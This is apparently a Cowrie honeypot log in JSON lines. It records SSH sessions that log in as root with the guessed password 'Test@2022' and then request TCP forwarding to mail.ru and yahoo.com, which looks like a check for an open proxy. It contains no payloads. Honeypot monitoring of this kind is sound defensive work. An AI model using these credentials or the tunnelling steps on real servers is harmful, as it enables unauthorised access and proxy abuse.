{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:16.778449Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.034097Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11738,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11738","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.086251Z","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.138044Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":30498,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30498","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.281699Z","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.332949Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":26278,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26278","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.477742Z","session":"b9d3b458f2f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.529603Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.581530Z","src_ip":"77.83.207.83","session":"b9d3b458f2f4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":30297,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d2d16ed067","protocol":"ssh","message":"New connection: 77.83.207.83:30297 (1.2.3.4:22) [session: f2d2d16ed067]","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.629609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.630563Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.680090Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41180,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c11ad8db47","protocol":"ssh","message":"New connection: 212.227.235.229:41180 (1.2.3.4:22) [session: 41c11ad8db47]","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.913204Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.928097Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7867,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7867","sensor":"my-vps","timestamp":"2025-08-31T03:52:17.978371Z","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.028144Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":23538,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23538","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.167882Z","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.217421Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":9098,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9098","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.360027Z","session":"f2d2d16ed067"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.409619Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.460176Z","src_ip":"77.83.207.83","session":"f2d2d16ed067"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":31202,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fcc7dfe723d","protocol":"ssh","message":"New connection: 77.83.207.83:31202 (1.2.3.4:22) [session: 4fcc7dfe723d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.509997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.510905Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.561177Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.812015Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19114,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19114","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.863150Z","session":"4fcc7dfe723d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:18.913575Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17415,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17415","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.056826Z","session":"4fcc7dfe723d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.107224Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.session.closed","duration":12.769658088684082,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.121763Z","src_ip":"212.227.235.229","session":"0f03b351b27d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20518,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20518","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.248675Z","session":"4fcc7dfe723d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.299045Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62371,"dst_ip":"1.2.3.4","dst_port":23,"session":"63014cf1da4c","protocol":"telnet","message":"New connection: 212.227.235.229:62371 (1.2.3.4:23) [session: 63014cf1da4c]","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.340705Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.350127Z","src_ip":"77.83.207.83","session":"4fcc7dfe723d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":32245,"dst_ip":"1.2.3.4","dst_port":22,"session":"31a08cf38836","protocol":"ssh","message":"New connection: 77.83.207.83:32245 (1.2.3.4:22) [session: 31a08cf38836]","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.398816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.399487Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.449865Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.697687Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19557,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19557","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.748444Z","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.798460Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32605,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32605","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.940294Z","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:19.990405Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":30058,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30058","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.132425Z","session":"31a08cf38836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.182308Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.233593Z","src_ip":"77.83.207.83","session":"31a08cf38836"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33021,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ac9547e9cd0","protocol":"ssh","message":"New connection: 77.83.207.83:33021 (1.2.3.4:22) [session: 7ac9547e9cd0]","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.282144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.282996Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.332410Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.579840Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22102,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22102","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.631415Z","session":"7ac9547e9cd0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.681189Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":9597,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9597","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.824033Z","session":"7ac9547e9cd0"}
